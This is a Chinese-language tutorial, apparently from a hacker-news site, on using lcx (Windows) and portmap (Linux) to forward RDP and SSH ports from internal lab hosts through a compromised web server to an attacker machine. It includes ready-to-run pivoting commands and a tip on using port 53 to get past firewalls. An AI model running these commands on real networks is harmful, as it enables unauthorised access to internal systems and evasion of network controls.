lcx--端口转发工具

lcx--端口转发工具

黑客资讯访客1970-01-01 8:00:003122A+A-

思维导图

1615379661_6048bccd1fd0329077fc6.png!small?1615379659867

一.Windows(lcx)

1.准备环境

win 7(web服务器):有两块网卡,一块连接内网,一块连接外网

内网ip:192.168.52.4

外网ip:192.168.0.103

win server 3(内网服务器) :只有内网一块网卡,win7能访问这个服务器

内网:192.168.52.3

win 10 咱们验证的机器

将工具都拉进win 7和win3中,方便下一步的端口转发

1615379690_6048bcea7b7b32f06973c.png!small?1615379689782

真实环境下,我们的win10物理机是访问不到内网里面的远程桌面连接的,我们要通过端口转发实现从win10中也能访问他内网的远程桌面

2.端口转发

A、正向代理:

 

a、首先在win 03上面做端口转发,将3389端口转发到web服务器上面地址的某个端口

 

lcx -slaveweb服务器(内网ip) 公网端口内网地址 内网端口

 

lcx -slave 192.168.52.4 6666 127.0.0.1 3389

 

或者

lcx -slave 192.168.52.4 6666 192.168.52.3 3389

1615379710_6048bcfe5cb2e9c67d26c.png!small?1615379709201

b、在web服务器监听到6666端口再转发出去,咱们vps服务器或者我们的攻击机器再去用远程桌面连接这个转发出来的端口

lcx –listen 刚才转发过来的端口 转发出去的端口(用户被vps或者攻击机的连接端口)

lcx –listen 6666 7777

1615379719_6048bd079cb7375d8b55a.png!small?1615379718318

c、验证:注意,连接的时候,是连接的web服务器的地址(他第一台沦陷的服务器)

验证:192.168.0.103:7777

发现成功连接上

1615379729_6048bd11599a299d12c01.png!small?1615379728531

总结:先开监听效果比较好

B、反向代理:

这一个就很简单了

a、在web服务器(win7)上进行反向连接

lcx -tran web服务器的端口(不被防火墙过滤) 内网地址 内网服务端口

lcx -tran 53 192.168.52.3 3389

1615379776_6048bd40265d532651984.png!small?1615379775049

53是web服务器上的端口,他访问内网的话,不被防火墙拦截

地址是反向代理的内网主机,3389是内网的远程桌面端口

注意:这个53端口是内部开放的,可以绕过防火墙,如果53不行就可以再换一个1000以内的

验证:

1615379784_6048bd48eac6ee114f329.png!small?1615379784629

2.Linux(portmap)

1.准备环境:

一台centos7 内网服务器()

内网IP:192.168.52.1

一台kali web服务器 可以连接内网,也可以连接外网()

内网ip:192.168.52.2

外网ip:192.168.0.100

一台win 10测试机 外网地址

外网ip:192.168.0.104

我们还是需要用同样的方法,把portmap工具放进这两台机子里面

1615379796_6048bd546a1f8f0dd820b.png!small?1615379795889

1615379803_6048bd5ba0184c2f78eb5.png!small?1615379802483

./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]

-v: version ##版本号

-h1: host1 ## 一般为被监听的内网地址

-h2: host2 ## 一般是内网的服务端口,列如22,3389等

-p1: port1 ## 一般是你转发给的公网地址

-p2: port2 ## 一般是你转发给的公网端口

-log: log the data ##记录数据到某个日志文件

-m: the action method for this tool ##选择的方法

1: listen on PORT1 and connect to HOST2:PORT2 ##在PORT1上侦听并连接到HOST2:PORT2 相当于lcx -tran

2: listen on PORT1 and PORT2 ##监听,相当于lcx中的

-listen 3: connect to HOST1:PORT1 and HOST2:PORT2 ##转发,相当于lcx -slave  Let me exit...all overd

2.端口转发

A、正向代理

介绍:(-m 2,3)先转发,再进行监听,最后再连接web服务器的端口

a、开启监听

正向连接:先转发内网ip和端口,再用web服务器监听,再用外边的进行连接

首先需要在web服务器开启监听(kali也可以)

 

./portmap -m 2 -p1 6666 -h2 公网主机的公网ip -p2 7777

 

./portmap -m 2 -p1 6666 -h2 192.168.0.103 -p2 7777

1615379911_6048bdc78a395587a31f6.png!small?1615379910344

b.端口转发

需要在内网主机上进行转发端口(centos7上面安装portmap)

 

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机内网ip -p2 6666

 

./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 192.168.52.2 -p2 6666

或者

./portmap -m 3 -h1 192.168.52.1 -p1 22 -h2 192.168.52.2 -p2 66661615379923_6048bdd323ceb051bdd0c.png!small?1615379922081

发现监听成功之后我们在外网win10上面进行验证

由于我们这里外边的win10 ping不同kali,我们就换一个centos只有一个外网网卡的来试一下

验证成功

1615379936_6048bde0c7ea9aa46af30.png!small?1615379935577

成功之后会发现监听

1615379948_6048bdec1fbd216b65701.png!small?1615379946862

B、反向代理

./portmap -m 1 -p1 转发的公网端口 -h2 内网地址 -p2 内网服务端口

./portmap -m 1 -p1 555 -h2 192.168.52.1 -p2 22

1615379959_6048bdf7cabd4e3753b43.png!small?1615379958520

验证

1615379970_6048be0257e30aee18f1c.png!small?1615379969935

一步到位,所以还是反向代理好使

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 断渊辞慾2022-06-05 23:00:36
  • 7 内网服务器()内网IP:192.168.52.1一台kali web服务器 可以连接内网,也可以连接外网()内网ip:192.168.52.2外网ip:192.168.0.100一台win 10
  • 南殷墓栀2022-06-06 03:16:37
  • 8.52.4 6666 192.168.52.3 3389b、在web服务器监听到6666端口再转发出去,咱们vps服务器或者我们的攻击机器再去用远程桌面连接这个转发

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理